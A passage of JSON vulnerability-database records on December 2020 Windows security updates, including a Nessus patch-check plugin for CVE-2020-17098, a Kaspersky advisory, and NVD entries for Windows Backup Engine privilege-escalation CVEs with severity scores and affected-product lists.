"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-23T15:15:01", "description": "The remote Windows host is missing security update 4592504 or cumulative update 4592498. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2020-17098)", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "KB4592504: Windows Server 2008 December 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-17098"], "modified": "2021-06-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_DEC_4592498.NASL", "href": "https://www.tenable.com/plugins/nessus/143562", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143562);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\"CVE-2020-17098\");\n script_xref(name:\"MSKB\", value:\"4592504\");\n script_xref(name:\"MSKB\", value:\"4592498\");\n script_xref(name:\"MSFT\", value:\"MS20-4592504\");\n script_xref(name:\"MSFT\", value:\"MS20-4592498\");\n script_xref(name:\"IAVA\", value:\"2020-A-0562-S\");\n\n script_name(english:\"KB4592504: Windows Server 2008 December 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4592504\nor cumulative update 4592498. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. 
(CVE-2020-17098)\");\n # https://support.microsoft.com/en-us/help/4592504/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a272a17b\");\n # https://support.microsoft.com/en-us/help/4592498/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6c43d069\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4592504 or Cumulative Update KB4592498.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17098\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-12';\nkbs = make_list('4592504', '4592498');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_NOTE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'12_2020',\n bulletin:bulletin,\n rollup_kb_list:[4592504, 4592498])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_note();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "kaspersky": [{"lastseen": "2021-08-18T10:59:18", "description": "### *Detect date*:\n12/08/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information.\n\n### *Affected products*:\nWindows Server, version 2004 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows RT 8.1 \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2019 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 
Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation)\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16959](<https://nvd.nist.gov/vuln/detail/CVE-2020-16959>) \n[CVE-2020-16958](<https://nvd.nist.gov/vuln/detail/CVE-2020-16958>) \n[CVE-2020-16961](<https://nvd.nist.gov/vuln/detail/CVE-2020-16961>) \n[CVE-2020-17098](<https://nvd.nist.gov/vuln/detail/CVE-2020-17098>) \n[CVE-2020-16964](<https://nvd.nist.gov/vuln/detail/CVE-2020-16964>) \n[CVE-2020-16960](<https://nvd.nist.gov/vuln/detail/CVE-2020-16960>) \n[CVE-2020-17140](<https://nvd.nist.gov/vuln/detail/CVE-2020-17140>) \n[CVE-2020-16962](<https://nvd.nist.gov/vuln/detail/CVE-2020-16962>) \n[CVE-2020-16963](<https://nvd.nist.gov/vuln/detail/CVE-2020-16963>) \n[ADV200013](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV200013>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2020-16964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16964>) 7.2 High \n[CVE-2020-16960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16960>) 7.2 High \n[CVE-2020-17140](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140>) 4.0 Warning \n[CVE-2020-16962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16962>) 7.2 High \n[CVE-2020-16963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16963>) 7.2 High \n[CVE-2020-16961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16961>) 7.2 High 
\n[CVE-2020-17098](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17098>) 2.1 Warning \n[CVE-2020-16959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16959>) 7.2 High \n[CVE-2020-16958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16958>) 7.2 High\n\n### *KB list*:\n[4592504](<http://support.microsoft.com/kb/4592504>) \n[4592471](<http://support.microsoft.com/kb/4592471>) \n[4592498](<http://support.microsoft.com/kb/4592498>) \n[4592503](<http://support.microsoft.com/kb/4592503>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-08T00:00:00", "type": "kaspersky", "title": "KLA12025 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-17098", "CVE-2020-17140"], "modified": "2020-12-16T00:00:00", "id": "KLA12025", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12025/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": 
[{"lastseen": "2022-03-23T14:27:36", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16962", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", 
"cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16962", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:32", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16961", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16961", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:37", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16963", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", 
"cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16963", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16963", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:34", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16960", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16960", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:x64:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:27:28", "description": "Windows Backup Engine Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-16958, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16963, CVE-2020-16964.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T00:15:00", "type": "cve", "title": "CVE-2020-16959", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16959", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16959", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 